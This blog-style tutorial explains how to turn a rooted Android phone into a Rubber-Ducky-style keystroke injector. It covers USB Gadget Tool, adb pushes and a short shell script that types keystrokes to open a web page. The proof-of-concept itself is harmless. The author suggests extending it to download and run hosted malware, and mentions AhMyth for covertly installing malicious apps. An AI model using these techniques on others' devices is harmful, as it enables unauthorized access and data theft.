Your Android as Rubber Ducky against targeted Android device or PC
I learned basic Android Hacking when I started my career in CyberSecurity. When I was in college, I attended a seminar about how people can be hacked using their smartphones. The speaker demonstrated a tool called AhMyth (Android Remote Administration Tool), a hacking tool used to create malicious Android apps or APK files. To exploit the victim, this needs to be installed on their phone without their knowledge. It can also be hidden using another app so that the victim doesn’t realize their device has been compromised.
Since then, I became curious about hacking Android devices. In 2022, I discovered Android HID. Android HID (Human Interface Device) refers to the use of Android devices as HID devices, or the ability for Android devices to interact with other HID-compliant devices.
Android as an HID Device
In this case, Android devices can function as a Human Interface Device. This typically involves using Android as a keyboard, mouse, or joystick that can interface with a host device (such as a computer, tablet, or another Android device) via USB or Bluetooth. This is achieved by using the Android operating system’s support for HID protocols.
For Example:
- Android phones or tablets can be used to send keyboard or mouse input to other devices by enabling the HID profile.
- Android apps can be designed to emulate input devices like keyboards, mice, or game controllers.
How is this used in attacks?
Primarily through malicious USB or Bluetooth connections, where the Android device pretends to be a keyboard, mouse, or other Human Interface Device (HID). This is a form of attack that takes advantage of how these devices are trusted by the operating systems they connect to.
In this article, I will show you how its done.
Prerequisites
- rooted Android phone with HID kernel support (e.g. NetHunter ROM)
- OTG cable
Some HID attacks use NetHunter support. However, its usage is too complicated and technical, so in this post, I will show you the simpler method (easy way).
Now let’s jump with the tutorial.
- So, imagine you’ve already installed NetHunter on your Android device successfully. Now, you need to download and install the
USB Gadget Tool from GitHub. This application will help enable HID on your Android.
GitHub - tejado/android-usb-gadget: Convert your Android phone to any USB device you like! USB Gadget Tool allows you to create and activate USB device roles, like a mouse or a keyboard. 🛠🛡📱
Convert your Android phone to any USB device you like! USB Gadget Tool allows yo...
- Open USB Gadget Tool app on your rooted Android phone, this is how it looks by default:
- If you look at the bottom ribbon, the Functions section is empty (
*). This is because hid.keyboard and hid.mouse are still disabled.
To enable our hid, click the top ribbon. Then you will see the Add Function button.
- We need our
hid.keyboard and hid.mouse you so enable or add that.
- Once you enable the
keyboard and mouse you will see at the bottom ribbon, under the functions, that this is already enabled.
- Install terminal app on your rooted Android. For this article, I used the
Termux terminal.
- And you need to login as
root by running command su
Prepare your Scripts
We need to create a script to automate attacks on the target device. To do this, you need to be familiar with the victim’s device navigation. For example, first, the position or location of the browsers like Google Chrome in the device, second, the position of Settings.
This is the script you can refer for the commands needed how you navigate on the device when executing the scripts.
GitHub - anbud/DroidDucky: SImple duckyscript interpreter in Bash.
SImple duckyscript interpreter in Bash. Contribute to anbud/DroidDucky deve...
- Transfer the
hid-gadget-test and droidducky.sh to your rooter device using adb. You need to used PC.
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.
F:\Demo\.Android-HID\payas0>dir
hid-gadget-test hid-pixel7pro
|
Run adb push hid-gadget-test /data/local/tmp
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.
F:\Demo\.Android-HID\payas0>adb push hid-gadget-test /data/local/tmp
hid-gadget-test: 1 file pushed, 0 skipped. 9.0 MB/s (17674 bytes in 0.002s)
|
Next transfer the bash script you created.
Run adb push your-batch-script.sh /data/local/tmp
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.
F:\Demo\.Android-HID\payas0>adb push your-batch-script.sh /data/local/tmp
your-batch-script.sh: 1 file pushed, 0 skipped. 1.3 MB/s (1079 bytes in 0.001s)
|
- And here’s the script I created for
Poc
#!/system/bin/sh
echo down | ./hid-gadget-test /dev/hidg1 keyboard
echo down | ./hid-gadget-test /dev/hidg1 keyboard
echo left | ./hid-gadget-test /dev/hidg1 keyboard
echo enter | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.2
echo left-ctrl n | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.5
echo left-ctrl l | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.6
echo p h - p a y a s 0 | ./hid-gadget-test /dev/hidg1 keyboard
echo period | ./hid-gadget-test /dev/hidg1 keyboard
echo g i t h u b | ./hid-gadget-test /dev/hidg1 keyboard
echo period | ./hid-gadget-test /dev/hidg1 keyboard
echo i o | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.3
echo enter | ./hid-gadget-test /dev/hidg1 keyboard
|
- And here’s the full video demonstration. This is simple PoC only. But you can create on your own’ like hosting a live malware on your website, then execute it using HID attacks.
Keynotes
USB HID Attack (Rubber Ducky Attack):
An Android device with HID (Human Interface Device) capabilities can impersonate a keyboard when connected to a computer via USB. This allows an attacker to send keystrokes and execute commands on the target system without the user’s knowledge. The attacker may use this access to perform malicious actions, such as downloading malware, stealing passwords, or gaining remote control of the device. Often, social engineering tactics are used to trick the user into connecting the Android device to the computer, making it appear harmless while hiding its malicious intent.
Conclusion:
In short, Android HID can be used by attackers to manipulate other devices by pretending to be an input device (keyboard, mouse, etc.) and performing unwanted actions, which could lead to data theft or system compromise.